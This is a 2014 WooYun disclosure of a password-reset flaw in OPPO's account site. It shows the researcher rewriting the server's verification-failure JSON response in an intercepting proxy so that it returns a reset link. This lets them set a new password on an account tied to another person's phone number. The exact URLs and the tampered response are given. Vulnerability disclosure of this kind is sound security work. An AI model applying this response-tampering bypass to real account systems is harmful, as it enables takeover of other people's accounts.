当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-069987

漏洞标题:oppo重置任意用户密码漏洞(4)

相关厂商:广东欧珀移动通讯有限公司

漏洞作者:

提交时间:2014-07-28 12:29

修复时间:2014-09-11 12:30

公开时间:2014-09-11 12:30

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-28: 细节已通知厂商并且等待厂商处理中
2014-07-28: 厂商已经确认,细节仅向厂商公开
2014-08-07: 细节向核心白帽子及相关领域专家公开
2014-08-17: 细节向普通白帽子公开
2014-08-27: 细节向实习白帽子公开
2014-09-11: 细节向公众公开

简要描述:

oppo之前我自己发过重置的3次了,别人也以不同姿势重置了N次,简直..
今天看到noob又提交了一个,于是再去看看。
审核的时候麻烦先帮我看看与http://www.wooyun.org/bugs/wooyun-2014-069939 是否重复,如重复勿过。

详细说明:

https://account.oppo.com/index.php?q=user/getbackpass&back=http%3A%2F%2Fwww.oppo.com%2F
找回密码,输入要找回的手机号,以找回手机号:13723782334示例


https://account.oppo.com/index.php?q=user/confirmid&type=1&sign=e9fb209c9416fb0312980c47c4537f0b
获取验证码-随便输入一个验证码,提交确认的时候response拦截

q1.jpg


收到响应:

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Jul 2014 04:15:39 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: Zandy/1.0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 28 Jul 2014 04:15:38 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Server-ID: web106
Content-Length: 56
{"flag":-4,"msg":"\u9a8c\u8bc1\u7801\u4e0d\u6b63\u786e"}


修改为:{"flag":1,"msg":"?q=user\/resetPass&username=&type=1&sign=e9fb209c9416fb0312980c47c4537f0b"}

q2.jpg


Forward出去响应包,即可绕过重置验证。

q3.jpg


设置密码,直接提交,帐号密码为 13723782334:wooyun123

漏洞证明:

q4.jpg


q5.jpg


该手机号非我本人所有,只是从以往白帽子提交重置的漏洞中找了一个示例手机号。

修复方案:

我记得很久之前,你们有向我索要联系方式,点的是乌云发送礼物的
后来虽然有开发跟我联系,但是貌似礼物无。
没礼物的话,求20RANK吧..没关系

版权声明:转载请注明来源 @乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-07-28 15:19

厂商回复:

确认存在,正在处理,感谢白帽子的关注,谢谢。

最新状态:

暂无